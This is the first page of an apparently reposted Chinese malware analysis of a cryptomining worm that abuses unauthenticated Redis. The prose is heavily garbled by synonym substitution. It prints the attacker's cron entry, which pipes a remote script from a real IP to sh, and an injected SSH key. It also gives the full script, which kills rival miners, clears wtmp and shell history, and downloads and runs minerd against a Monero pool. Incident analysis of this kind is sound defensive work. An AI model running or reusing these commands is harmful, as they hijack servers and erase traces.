欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

应用Redis未受权探访破绽漏洞bug的挖矿木马病毒死缠烂打

来源:本站整理 作者:佚名 时间:2017-09-13 TAG: 我要投稿

一、REDIS未受权拜访破绽漏洞bug
Redis 默许情况下,会绑定在 0.0.0.0:6379,如许将会将Redis办事裸露到公网上,假如在没有开启认证的情况下,能够招致随意率性用户在能够拜访目标办事器的情况下未受权拜访Redis和读取Redis的数据。
2015年该病毒迸发,网路上也有很多的阐发报告。但是时隔两三年,该病毒仍然阴魂不散,经由进程赓续转变下载办事器url,继承在收集中残虐。第一阐明利用 redis 沾染病毒停止挖矿仍然有利可图;第二阐明裸露在公网上的redis办事器浩繁,有些管理员险些到了麻木不仁的田地,对本身的主机体系的安全金石为开,继承做收集攻击入侵者的“爪牙”。
二、进程先容
近期,华屹安全团队在对客户实行安全办事时,发明客户Redis体系数据非常。经由进程研究阐发,技巧职员发明攻击入侵者经由进程redis未受权拜访破绽漏洞bug停止攻击入侵,在目标的redis上创立了两个症结key,一个名为woxdtzfwar、另一个名为crackit。内容分别为:
l  woxdtzfwar文件
*/1 * * * * /usr/bin/curl -fsSLhttp://172.104.190.64:8220/test11.sh | sh
l  crackit文件
ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQDE0guChoiGr6s3mXjQA0wX6YKNNMy2bpj6b8ArjuWH/mjN17bu275t/ZlSarmMC5hCVAx7eJEzqxqy43AiBS61UuFpWZXWal5b6XWdvrH6pCJOI5+ceeFMEmc64B7GNrs2OPyuaP0HST/xh0YyWwoE/2uZmc3EyiR8sIP7/11N+xhHH4nIZB/M8QDaBRN6DWUNd/kzLDuIHr4LntuhKEZpCuQIuiDm7ZBYzbYhGtpPWnO04FzbfMUqP1JssTd/G/mUflRgQhKVACyF8rd8o/o7Zy6I9JVgLV6FpNOLc5Ep9VJuFXxmcxWc+Bj//Sd4pgn4gbmb8GzAvlH2xxw+SV2hredis@redis.io
详细以下图所示:

利用IE间接拜访http://172.104.190.64:8220/test11.sh

保留后,关上,发明其内容以下:
#!/bin/bash
(ps auxf|grep -vgrep|grep minerd |awk '{print $2}'|xargs kill -9;crontab -r;pkill -9minerd;pkill -9 i586;pkill -9 gddr;echo > /var/log/wtmp;history -c;cd ~;curl-L http://172.104.190.64:8220/minerd -o minerd;chmod +x minerd;setsid ./minerd-B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo-p x &>>/dev/null)
详细说明以下:
1、利用ps敕令枚举进程,看能否曾经有存在名为minerd进程,若有则杀掉进程;
(ps auxf|grep -v grep|grep minerd |awk '{print$2}'|xargs kill -9;
2、消除以后用户crontab义务列表;
crontab -r;
3、杀进程(再次杀进程,分别为minerd/i586/gddr进程名,预测能否为病毒早前沾染法式名)
pkill -9 minerd;
pkill -9 i586;
pkill -9 gddr;
4、清日记
echo > /var/log/wtmp; //体系每次登录,都邑在此日记中增加记载,该文件为二进制文件
history -c;           //清空敕令操纵日记
5、回到用户主目次
cd ~;
6、下载并启动进程minerd
curl -Lhttp://172.104.190.64:8220/minerd -o minerd;       //下载到当地
chmod +x minerd;    //增长履行权限
setsid ./minerd -B -a cryptonight -ostratum+tcp://xmr.crypto-pool.fr:3333 -u41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo-p x &>>/dev/null) //setsid    敕令, minnerd进程履行后保卫进程。
此中,minnerd为挖矿法式,衔接的办事器为 xmr.crypto-pool.fr:3333,挖矿帐号为41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo,暗码为x(这个暗码选项无所谓,值可随意设置)。
利用baidu搜刮 minerd,搜刮结果表现 minerd 是一个臭名远扬的比特币挖矿法式。此中攻击入侵办法、sh文件内容等根本同样,阐明该攻击入侵是基于redis未受权破绽漏洞bug的病毒。收集上颁发的基于minerd的下载url为:curl -L http://67.209.185.118:8220/minerd -o minerd,颠末拜访,该页面曾经生效不克不及拜访。由此可推测,本次的攻击入侵应该是病毒制作者的一次阵地转移,其攻击入侵伎俩、乃至sh敕令都没有变化,只是简略的改动了下载办事器url。
别的,荣幸的是本次客户redis安装在windows操纵体系,而该病毒面对的目标体系是linux体系,病毒使用的crontab启动办法、curl下载、minerd挖矿法式等都是基于linux平台的,无奈在windows体系下运转,是以并无对客户主机有更深刻的损坏。
客户redis情况以下图所示:

 
对新的下载办事器停止阐发,发明该办事器位于美国,属于linode公司,预测能够是购买了linode的vps办事搭建的办事器。

 
 

别的,该办事器还凋谢了22端口,登录后发明其操纵体系和ssh版本以下图所示:

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载